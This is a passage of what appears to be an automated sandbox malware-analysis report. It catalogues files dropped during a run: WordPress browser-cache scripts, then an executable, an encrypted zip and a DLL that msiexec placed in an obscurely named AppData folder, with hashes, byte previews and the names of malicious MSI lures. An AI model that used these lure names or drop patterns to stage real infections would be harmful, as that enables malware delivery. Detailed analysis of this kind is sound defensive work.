                                                                                              Preview: (function(win,doc){function $$(selector,root){return(root||doc).querySelector(selector);}.function $$$(selector,root){return(root||doc).querySelectorAll(selector);}.let f3h=new F3H({turbo:F3H.state.statically.turbo,sources:'a[href]:not([href*="/wp-admin/"]), form:not([action*="/wp-admin/"])',}),currentBody=doc.body,currentElements=$$$(F3H.state.statically.elementsToReplace),currentMetaDescription=$$('meta[content][name="description"]'),currentMetaDescriptionOG=$$('meta[content][name="og:description"]'),currentRoot=doc.documentElement;f3h.on(200,function(next){let nextBody=next.body,nextElements=$$$(F3H.state.statically.elementsToReplace,next),nextMetaDescription=$$('meta[content][name="description"]',next),nextMetaDescriptionOG=$$('meta[content][name="og:description"]',next),nextRoot=next.documentElement;doc.title=next.title;currentMetaDescription&&nextMetaDescription&&(currentMetaDescription.content=nextMetaDescription.content);currentMetaDescriptionOG&&nextMetaDescriptionOG&&(current
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\related[1].css
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):307
                                                                                              Entropy (8bit):4.723317211635612
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:RhepzIdruh3/QhaMGAchHUfQht5EHt3SrKM3oY:Rhepf3euAchHU+t5EHtxXY
                                                                                              MD5:825ACC65C7A3728F76A5B39CDC177E6F
                                                                                              SHA1:B6B834D63A274DD4AA1C21FA9AFE815A3087B190
                                                                                              SHA-256:2EFE0D8072659B087901323E1FDB18A0F57E6011CB9CB7EDFF6E1723FC2E8D70
                                                                                              SHA-512:3603613574BBD412AF97A0790110BE15FEFD9F5EE8868C26CED851F841C14E09F534C97719AC80D1E2E1D4E30E5F323D577C513AF85E0F9A697D175590CE0F42
                                                                                              Malicious:false
                                                                                              Preview: .yarpp-related{margin-bottom:1em;margin-top:1em}.yarpp-related a{font-weight:700;text-decoration:none}.yarpp-related .yarpp-thumbnail-title{font-size:96%;font-weight:700;text-align:left;text-decoration:none}.yarpp-related h3{font-size:125%;font-weight:700;margin:0;padding:0 0 5px;text-transform:capitalize}
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\responsive-menus.min[1].js
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines
                                                                                              Category:dropped
                                                                                              Size (bytes):3684
                                                                                              Entropy (8bit):5.1348384607352004
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:F5tU/LZ7kq/+zq+8RmZQSZQJC42sNaQJFHieJg+H27piAjDAX8:F5tU/Wzp8RmZhZ2C42sNagFH3K+H27/b
                                                                                              MD5:B91463AB6669A51798933A81B4B94C3F
                                                                                              SHA1:75BC297B3EFF7E8EDA43B119BD2C4C249F8A8D90
                                                                                              SHA-256:6FD951519999C4F446DB71F347635025ADDB27C21D3B5915D498732EA1EEC927
                                                                                              SHA-512:265E27DC66C46472B9E94B35B9F5299BA1C5B2527F13070DD534B06AB25BE08BD93817C8CC5E8DDE24F2F744078673F2638AE8A966FC07DA730EC26D03FBC7C7
                                                                                              Malicious:false
                                                                                              Preview: /*. GPL-2.0-or-later.*/.(function(p,b,y){function q(){var a=b('button[id^\x3d"genesis-mobile-"]').attr("id");if("undefined"!==typeof a){"none"===l(a)&&(b(".menu-toggle, .genesis-responsive-menu .sub-menu-toggle").removeClass("activated").attr("aria-expanded",!1).attr("aria-pressed",!1),b(".genesis-responsive-menu, .genesis-responsive-menu .sub-menu").attr("style",""));var c=b(".genesis-responsive-menu .js-superfish"),d="destroy";"function"===typeof c.superfish&&("none"===l(a)&&(d={delay:100,animation:{opacity:"show",height:"show"},.dropShadows:!1,speed:"fast"}),c.superfish(d));r(a);t(a)}}function u(){var a=b(this),c=a.next("nav");a.attr("id","genesis-mobile-"+b(c).attr("class").match(/nav-\w*\b/))}function t(a){if(null!=f){var c=f[0],d=b(f).filter(function(a){if(0<a)return a});"none"!==l(a)?(b.each(d,function(a,d){b(d).find(".menu \x3e li").addClass("moved-item-"+d.replace(".","")).appendTo(c+" ul.genesis-nav-menu")}),b(k(d)).hide()):(b(k(d)).show(),b.each(d,function(a,d){b(".moved-ite
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\sassy-social-share-public[1].js
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):110616
                                                                                              Entropy (8bit):5.338803658245896
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:67d6AkjUwUo5uYvYUfbtCU2wdVj1B8p1rrTTdlQ6F8JLWnB0V1KMXt7BX5zb20bp:LUMjxsnsaBHdnl3i
                                                                                              MD5:77461609E7BB225F75F17659DF7FC0B2
                                                                                              SHA1:7E1D516BAE29AB2E526AAE01FE7D0095735EF079
                                                                                              SHA-256:CE92CA64223CEF55E77FD3CA485B1A3769FBC13513BCDC8BD2C02D3B952D45A1
                                                                                              SHA-512:909AB00C6D7D8638D6F37F8134B3A91B951BC629E45F5195B5070C2219EC456DEBEC8B5C0BEBF76DEBC34A8CF472B4D06F44531149A5185C91386341B3927EB5
                                                                                              Malicious:false
                                                                                              Preview: function heateorSssDetermineWhatsappShareAPI(b){if(b)return-1!=navigator.userAgent.indexOf("Mobi")?"api.whatsapp.com":"web.whatsapp.com";var a=jQuery("i.heateorSssWhatsappBackground a").attr("href");return void 0!==a?-1!=navigator.userAgent.indexOf("Mobi")?(jQuery("i.heateorSssWhatsappBackground a").attr("href",a.replace("web.whatsapp.com","api.whatsapp.com")),"api.whatsapp.com"):(jQuery("i.heateorSssWhatsappBackground a").attr("href",a.replace("api.whatsapp.com","web.whatsapp.com")),"web.whatsapp.com"):""}function heateorSssMoreSharingPopup(j,a,b,h){var c,e,d,i,f,g;a=encodeURIComponent(a),concate='</ul></div><div class="footer-panel"><p></p></div></div>',c={facebook:{background_color:"#3c589a",title:"Facebook",redirect_url:"https://www.facebook.com/sharer.php?u="+a+"&t="+b+"&v=3",svg:'<svg focusable="false" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="-5 -5 42 42"><path d="M17.78 27.5V17.008h3.522l.527-4.09h-4.05v-2.61c0-1.182.33-1.99 2.023
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\sassy-social-share-svg[1].css
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):115041
                                                                                              Entropy (8bit):5.398902519058946
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:QOnCMELX2hDtk0+se3ZSfV0oUK877kgVAcsy2xaSkD3V:NhN2FSetPEWYdo3V
                                                                                              MD5:FB6069EF6A7CBDDC292EB0DCB6CFFFF0
                                                                                              SHA1:0014ACF90F414387A377C6297B2FBA616A753886
                                                                                              SHA-256:09515804102C664C80C06CFAFE509967A2640E1CBAA1CF4C79D0D43AAA39745E
                                                                                              SHA-512:690F2466A4F5542C3D0D7792F6F1EA764EE60BE77194DB2EB1216A71DF504707345142C3A59CDFE4F821E5E57E0FF51D8125481CA50E5F3586F37EAFE9332296
                                                                                              Malicious:false
                                                                                              Preview: .heateorSssYummlySvg{background:url(data:image/svg+xml;charset=utf8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAzMCAzMCI+PHBhdGggc3Ryb2tlPSIjZmZmIiBkPSJNMTAuNSAxMHE0LTIgMi41IDFsLTEgNHEwIDIgNSAwbDEtNi41TTE3IDE1bC0xIDRjLTMgNi02LTEgMC0xcTEtMSA1IDEiIHN0cm9rZS13aWR0aD0iMiIgZmlsbD0ibm9uZSIvPjwvc3ZnPg==) no-repeat center center}.heateorSssBufferSvg{background:url(data:image/svg+xml;charset=utf8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9Ii00IC00IDM4IDM5Ij48cGF0aCBzdHJva2U9IiNmZmYiIGQ9Ik0xNSA2IDUgMTFsMTAgNSAxMC01eiIgc3Ryb2tlLXdpZHRoPSIwIiBmaWxsPSIjZmZmIi8+PHBhdGggc3Ryb2tlPSIjZmZmIiBkPSJNNS41IDE0LjVsOS41IDUgOS41LTVtLTE5IDQgOS41IDUgOS41LTUiIHN0cm9rZS13aWR0aD0iMiIgZmlsbD0ibm9uZSIvPjwvc3ZnPg==) no-repeat center center}.heateorSssFacebookSvg{background:url(data:image/svg+xml;charset=utf8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9Ii01IC01IDQyIDQyIj48cGF0aCBkPSJNMTcuNzggMjcuNVYxNy4wMDhoMy41MjJsLjUyNy00LjA5aC00L
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\skip-links.min[1].js
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):386
                                                                                              Entropy (8bit):5.01416430684427
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:A3jgZvpvo2V+eHYbDRd7Dh2Vf9NYsjVRHqre1b8JmeZfg+RCQg+RZCQnoiCQc:ATopvJmDRRIFNYQZ2e1QH1CgZHx8
                                                                                              MD5:8A54CF62FFE6CBBF248C36D67FBEB45A
                                                                                              SHA1:9D8B81DBB0FD63FC43818A49C8536D789CA06F20
                                                                                              SHA-256:ADE38136058FCD75880D3673855AFF859EE377D5915E59CCCF24A973D418BEBB
                                                                                              SHA-512:4270AA89AC19EDC6A57FC70555800F214D167C8537BC8FDD54C89F5F7A7DFABF8C79F13DAB62F498F3C851BFAC039904F4824F606A6847C02B1F3FEF69B527CB
                                                                                              Malicious:false
                                                                                              Preview: function ga_skiplinks(){"use strict";var fragmentID=location.hash.substring(1);if(fragmentID){var element=document.getElementById(fragmentID);element&&(!1===/^(?:a|select|input|button|textarea)$/i.test(element.tagName)&&(element.tabIndex=-1),element.focus())}}window.addEventListener?window.addEventListener("hashchange",ga_skiplinks,!1):window.attachEvent("onhashchange",ga_skiplinks);
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\superfish.args.min[1].js
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):132
                                                                                              Entropy (8bit):4.923034560408535
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:RAMTFNQWg5BVWAoxXmsVoLrVVEtLpO5HKuaNY6Zfn:z/Dgi/olWLpCKua26Zf
                                                                                              MD5:C94B7AEED7521DC95699CD74F9609B19
                                                                                              SHA1:7B19E24F0D95007F896156FE38283B39F32B9988
                                                                                              SHA-256:20550F7BCB2A817AC9A5879E04260DA8268E971C0B8031A6B7A2F48A55EE60D5
                                                                                              SHA-512:7663A443D0DA7B4A0B16070B6064DDA95FBCA04F5256069717C1013901AACBC2E2695B4B6EE215BD57A12D398FD03B3E60A0912F78B89B00704FA6FCF1157B6C
                                                                                              Malicious:false
                                                                                              Preview: jQuery(function($){"use strict";$(".js-superfish").superfish({delay:100,animation:{opacity:"show",height:"show"},dropShadows:!1})});
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\superfish.min[1].js
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines
                                                                                              Category:dropped
                                                                                              Size (bytes):4499
                                                                                              Entropy (8bit):5.1823978686025605
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:F2aSCPKW7HJ8paUup6HdORFpgDX8g4Ig43VK3Ydp:C6WXxHyFpgaIgiT
                                                                                              MD5:AF42109DBC91E0D99FD0041DD9C3395A
                                                                                              SHA1:7266B5E6EF8E7FC633511D669AF04220F1569FBB
                                                                                              SHA-256:ECE565A1F66A32347DFED83562C428FF7736648DE72B0027DD8F0E0F27E0C327
                                                                                              SHA-512:81D86D725C146429074926FF43BF7EF91B2C58BE1E0CB2873B5E530BB911FD79EF94DCB372F64344B9F8048BB169D316188C4FBA3FC86C50489CCA58A1C91508
                                                                                              Malicious:false
                                                                                              Preview: /*. * jQuery Superfish Menu Plugin - v1.7.10. * Copyright (c) 2018 Joel Birch. *. * Dual licensed under the MIT and GPL licenses:. *.http://www.opensource.org/licenses/mit-license.php. *.http://www.gnu.org/licenses/gpl.html. */..;!function(a,b){"use strict";var c=function(){var c={bcClass:"sf-breadcrumb",menuClass:"sf-js-enabled",anchorClass:"sf-with-ul",menuArrowClass:"sf-arrows"},d=function(){var b=/^(?![\w\W]*Windows Phone)[\w\W]*(iPhone|iPad|iPod)/i.test(navigator.userAgent);return b&&a("html").css("cursor","pointer").on("click",a.noop),b}(),e=function(){var a=document.documentElement.style;return"behavior"in a&&"fill"in a&&/iemobile/i.test(navigator.userAgent)}(),f=function(){return!!b.PointerEvent}(),g=function(a,b,d){var e,f=c.menuClass;b.cssArrows&&(f+=" "+c.menuArrowClass),e=d?"addClass":"removeClass",a[e](f)},h=function(b,d){return b.find("li."+d.pathClass).slice(0,d.pathLevels).addClass(d.hoverClass+" "+c.bcClass).filter(function(){return a(this).children(d.popUpSelector).hi
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\v64f9daad31f64f81be21cbef6184a5e31634941392597[1].js
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):13797
                                                                                              Entropy (8bit):5.270601944153988
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:ejezNSCIcKxU//BntQVX9sLjKNZl+6GPhRMIheJdIxnofM192yQondgbG0YobwH:hICIn7siNuthRxMdIxnof5vbM
                                                                                              MD5:A328A9B416ABADF1D7B87C846D790D26
                                                                                              SHA1:D2F3E9AA75FAA2B55282A9281916231D34718A77
                                                                                              SHA-256:5BF0A170AE91F1BB8D0C94381A74AB8B85F938BF31BF18A9C8E3B835250D3BE6
                                                                                              SHA-512:815FDBA20AD44D53F63772334C32B380FD09B35820E1F6F0B5807A7ED80B6CA42EFD5F321F6FA5ACA09F2877A587848EDC33F32A3E3F8254CEFAD3491839DBD0
                                                                                              Malicious:false
                                                                                              Preview: !function(e){function t(r){if(n[r])return n[r].exports;var i=n[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var n={};t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="",t(t.s=0)}([function(e,t,n){"use strict";var r=this&&this.__assign||function(){return r=Object.assign||function(e){for(var t,n=1,r=arguments.length;n<r;n++){t=arguments[n];for(var i in t)Object.prototype.hasOwnProperty.call(t,i)&&(e[i]=t[i])}return e},r.apply(this,arguments)};t.__esModule=!0;var i=n(1),o=n(2),a=n(3),c=n(4);!function(){function e(e){var t="";if(t=window.location.origin?window.location.origin:window.location.protocol+"://"+window.location.host,e&&"string"==typeof e)if(0===e.indexOf("/"))t+=e;else try{var n=new URL(e);return n.prot
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\v64f9daad31f64f81be21cbef6184a5e31634941392597[2].js
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):13797
                                                                                              Entropy (8bit):5.270601944153988
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:ejezNSCIcKxU//BntQVX9sLjKNZl+6GPhRMIheJdIxnofM192yQondgbG0YobwH:hICIn7siNuthRxMdIxnof5vbM
                                                                                              MD5:A328A9B416ABADF1D7B87C846D790D26
                                                                                              SHA1:D2F3E9AA75FAA2B55282A9281916231D34718A77
                                                                                              SHA-256:5BF0A170AE91F1BB8D0C94381A74AB8B85F938BF31BF18A9C8E3B835250D3BE6
                                                                                              SHA-512:815FDBA20AD44D53F63772334C32B380FD09B35820E1F6F0B5807A7ED80B6CA42EFD5F321F6FA5ACA09F2877A587848EDC33F32A3E3F8254CEFAD3491839DBD0
                                                                                              Malicious:false
                                                                                              Preview: !function(e){function t(r){if(n[r])return n[r].exports;var i=n[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var n={};t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="",t(t.s=0)}([function(e,t,n){"use strict";var r=this&&this.__assign||function(){return r=Object.assign||function(e){for(var t,n=1,r=arguments.length;n<r;n++){t=arguments[n];for(var i in t)Object.prototype.hasOwnProperty.call(t,i)&&(e[i]=t[i])}return e},r.apply(this,arguments)};t.__esModule=!0;var i=n(1),o=n(2),a=n(3),c=n(4);!function(){function e(e){var t="";if(t=window.location.origin?window.location.origin:window.location.protocol+"://"+window.location.host,e&&"string"==typeof e)if(0===e.indexOf("/"))t+=e;else try{var n=new URL(e);return n.prot
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\wpp.min[1].js
                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):3011
                                                                                              Entropy (8bit):5.403674013094211
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:nZNs1+QXT+jLpGqZeqqaZXaZJpVU+bIo/hAtAVf3p0KmBdplsm3uzmO9FiJW980B:ZNsIQD+jLoqZTZqZVB/dL4BumEBrrDZR
                                                                                              MD5:6371129B628B092A908A0E45E3A32E74
                                                                                              SHA1:CEF118B5376D6DBC727F0F0F8FE6FE7F64FFA2CE
                                                                                              SHA-256:ACE4208545FB0FF5EA87FBE1470D3BF0AF8E73D7D52FEA869966C4B9D8C78A60
                                                                                              SHA-512:C3C999135753490BFA7CAC6E84BD9A13167128BE5E6B7A8F9439A813E46F69D06F3BE2AB94C25A952E6D74B1C0DACDFD5C6CA3151430AB31033EB215091DFFF2
                                                                                              Malicious:false
                                                                                              Preview: var wpp_params=null,WordPressPopularPosts=function(){var m=function(){},h=!!HTMLElement.prototype.attachShadow,f=function(b,c,a,g,k){var e=new XMLHttpRequest;b=-1!=["GET","POST"].indexOf(b)?b:"GET";var d={"X-Requested-With":"XMLHttpRequest"};"POST"==b&&(d["Content-Type"]="application/x-www-form-urlencoded");"object"==typeof k&&Object.keys(k).length&&(d=Object.assign({},d,k));e.open(b,c+("GET"==b?"?"+a:""),!0);for(var l in d)d.hasOwnProperty(l)&&e.setRequestHeader(l,d[l]);e.onreadystatechange=function(){4===..e.readyState&&200<=e.status&&300>e.status&&"function"===typeof g&&g.call(void 0,e.response)};e.send("POST"==b?a:null)};return{get:function(b,c,a,g){a="function"===typeof a?a:m;f("GET",b,c,a,g)},post:function(b,c,a,g){a="function"===typeof a?a:m;f("POST",b,c,a,g)},ajax:f,theme:function(b){if(h){var c=document.createElement("style"),a=document.createElement("ul");a.innerHTML='<li><a href="#"></a></li>';b.parentNode.appendChild(a);var g=getComputedStyle(a.querySelector("li")),k=getCom
                                                                                              C:\Users\user\AppData\Local\Temp\~DF809FE4934051D0D6.TMP
                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):16384
                                                                                              Entropy (8bit):0.12987372519899068
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:a/vllGXalyPSQlkxMLzK1LtKYp24Koyxn0ipluV4FQeqfSia1uTQlwkClKQlCut:i9lmatQsfpo96QJqaiouk+LQQYu
                                                                                              MD5:974EB7FFFCE3767926F63B4338A67953
                                                                                              SHA1:C0B8ECF9BCF443B74F5902710594A72EECA60C67
                                                                                              SHA-256:49D5D8A599A02D0AD94102D41D26BD5245BC225A1CB6651B3B75BA8CF68E8172
                                                                                              SHA-512:1BBD8346F5116B6E07EDDB9A2069DA5EB1F1B7CB082032B597B16EFBA31523F6307105CA014A234D90B0AFF04C6658135877471581CE1F4BA0345E439B157875
                                                                                              Malicious:false
                                                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Temp\~DF81679F05C4A05F70.TMP
                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):16384
                                                                                              Entropy (8bit):0.08166605033653279
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:lkG20uoll1QTkG201NR/lclllv/nt+lybltll1lRslkhlEkllhDLG20w/T56G20I:lkxcvskxyUFAlkxBLxVkx
                                                                                              MD5:796FB6D475E24ACE3CD82738B56A9459
                                                                                              SHA1:AF47FE96EB75D66E329900D0FEDA6297BFE2110F
                                                                                              SHA-256:76659394338F4786F1F349F1DC4414B6E89E5C1B7072CF0ADD136CBFA15CB7FE
                                                                                              SHA-512:287EE50892649354B59F83A0AC515706C0E5A9F078BB53BDA58E39A693C1CE57B0B925AC1E611CBEB41557B51F61DB75170E77D29846B8FBE215F5B71F6017F2
                                                                                              Malicious:false
                                                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1284592
                                                                                              Entropy (8bit):6.17341072126558
                                                                                              Encrypted:false
                                                                                              SSDEEP:24576:INMcwQuMBsWH0UadPh5v7kTQu+3XRjQf0ffK:4DssU7YT0HV/HK
                                                                                              MD5:06B1B36CD7C59CF46CD7F5D661C4DA6F
                                                                                              SHA1:ED225D67E410C4C70A205FE969DEF346035ADA72
                                                                                              SHA-256:0D1882DB000F8898F7598E87CEFD2F1F7689524EE10B406870D1AE7A92EE775B
                                                                                              SHA-512:6E448B9E44B57F05CC760C313D4898751AFC23B2DB14C4F981880E0183AF67944D92AB0AD946B52D365E17BA5F2A6B2A97097450AC8A0E5C636F1C43A21D7C3A
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: GeruDanfe.msi, Detection: malicious, Browse
                                                                                              • Filename: TJ-eProtestoBoletoIndevido.msi, Detection: malicious, Browse
                                                                                              • Filename: ContratoAprovado+002336.msi, Detection: malicious, Browse
                                                                                              Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.....................$.h....$.j.....$.k....u..................................................L.........VB................Rich....................PE..L...@.*Z..........#...............................@..................................C..............................p...L............p...b...........~..................p...............................@............................................text...z........................... ..`.rdata..............................@..@.data....k.......D..................@....gfids..L....`......................@..@.rsrc....b...p...d..................@..@................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.zip (copy)
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:Zip archive data, at least v2.0 to extract
                                                                                              Category:dropped
                                                                                              Size (bytes):8280101
                                                                                              Entropy (8bit):7.999729820463899
                                                                                              Encrypted:true
                                                                                              SSDEEP:196608:6abd9oDJG0UKYmnkqz6JuTn17Or2pIqjfjb+oVix2x:6aUG0yE6QlOr2DfjrQx+
                                                                                              MD5:505F30F0DC5DB5515870D49B8A058C27
                                                                                              SHA1:3933BBDDC8723D8EBFDEB5E961B9A317D11988BF
                                                                                              SHA-256:308D07FA6EA5A3E88F7BBDCBC5D7DF86EFB1C39C6736AB16059D88046C99933F
                                                                                              SHA-512:F30E0762F6EED8C1D023AA3E6B900B97EBE649BEFDAE1982BFE84C8438F8469C6C8BE6F167FD21C1B1FB67B3A08D957916C69967CE15C3C351B07790A15A312E
                                                                                              Malicious:false
                                                                                              Preview: PK........`+.K..l...........Object.exe.qT[U../4)iIKhS.5.8.*V....5.<.T. ...Tc....6X.;J.../(up..W\X.g.....5ZN.n.......;.>5....V4{....{iH..6.........~...Q..f2...a_.0!G....w.2..Y...w...9.T..K...{,.....z..;w..Zn...z.e.NK^q...].;W/Z...a.......!..".=......k..m..m.......9n._..S....._..:..C.".u.C...V......q{h.|=.k..|x1n.=~......r.].C .0IK.V.D.7NV&.&-&Db_.ip...TB..S.."..L..$..-._.M.h....h...o<.%..m....C=K...U..XJB.*.6....9.K.~.M#......;k.l.....@P.&.c!.z.{.w+!o}0....mp......6.....ZBH.L.%g....o....=g;\K...4..{..;..=a.!n.]..#.......i..|.......yM..*.|.mT0..g5.796.+..D.<.Jh...p.K...N;.....I..d)-..Ir.T&o..0&.l..os.c.p....p.!\..{.a.IZ.@u.....tiG.....rZ...k..k..e..}..-.p...W.S..y.A....:DCM...N^[..>}.0-.5.M..!u[......W....k.m..bC..C....7..];P.....g......w..w.~K.#...d......if...}D...>J....;?..r?......."...}7......_...u..v.S..5.5"+\m.TZ..z.f.N.Nz..T.~..-.:...=U0x...ut....,............R`...5Tk..`.j..8..$a......B7..[....M.)!.O..Si.O..k5>a........h..'L.|M
                                                                                              C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.zip.part
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:Zip archive data, at least v2.0 to extract
                                                                                              Category:dropped
                                                                                              Size (bytes):8280101
                                                                                              Entropy (8bit):7.999729820463899
                                                                                              Encrypted:true
                                                                                              SSDEEP:196608:6abd9oDJG0UKYmnkqz6JuTn17Or2pIqjfjb+oVix2x:6aUG0yE6QlOr2DfjrQx+
                                                                                              MD5:505F30F0DC5DB5515870D49B8A058C27
                                                                                              SHA1:3933BBDDC8723D8EBFDEB5E961B9A317D11988BF
                                                                                              SHA-256:308D07FA6EA5A3E88F7BBDCBC5D7DF86EFB1C39C6736AB16059D88046C99933F
                                                                                              SHA-512:F30E0762F6EED8C1D023AA3E6B900B97EBE649BEFDAE1982BFE84C8438F8469C6C8BE6F167FD21C1B1FB67B3A08D957916C69967CE15C3C351B07790A15A312E
                                                                                              Malicious:false
                                                                                              Preview: PK........`+.K..l...........Object.exe.qT[U../4)iIKhS.5.8.*V....5.<.T. ...Tc....6X.;J.../(up..W\X.g.....5ZN.n.......;.>5....V4{....{iH..6.........~...Q..f2...a_.0!G....w.2..Y...w...9.T..K...{,.....z..;w..Zn...z.e.NK^q...].;W/Z...a.......!..".=......k..m..m.......9n._..S....._..:..C.".u.C...V......q{h.|=.k..|x1n.=~......r.].C .0IK.V.D.7NV&.&-&Db_.ip...TB..S.."..L..$..-._.M.h....h...o<.%..m....C=K...U..XJB.*.6....9.K.~.M#......;k.l.....@P.&.c!.z.{.w+!o}0....mp......6.....ZBH.L.%g....o....=g;\K...4..{..;..=a.!n.]..#.......i..|.......yM..*.|.mT0..g5.796.+..D.<.Jh...p.K...N;.....I..d)-..Ir.T&o..0&.l..os.c.p....p.!\..{.a.IZ.@u.....tiG.....rZ...k..k..e..}..-.p...W.S..y.A....:DCM...N^[..>}.0-.5.M..!u[......W....k.m..bC..C....7..];P.....g......w..w.~K.#...d......if...}D...>J....;?..r?......."...}7......_...u..v.S..5.5"+\m.TZ..z.f.N.Nz..T.~..-.:...=U0x...ut....,............R`...5Tk..`.j..8..$a......B7..[....M.)!.O..Si.O..k5>a........h..'L.|M
                                                                                              C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Oleacc.dll
                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):9444864
                                                                                              Entropy (8bit):7.635917415323296
                                                                                              Encrypted:false
                                                                                              SSDEEP:196608:y5aHjDTqp9NcR8st+HolJnboxqpgaVJVvSoB:y2DwN+WI3oxq5JVj
                                                                                              MD5:96E5DABB986D4A653BA7382F14E9F4AF
                                                                                              SHA1:2AF9C00F61FD821F7DBDBD222E2CA2B1652ECCA7
                                                                                              SHA-256:E116A603CEB5D60463F54AD79B31B9A04A21B2C8AFEA1FB72149DB2805A4D4D8
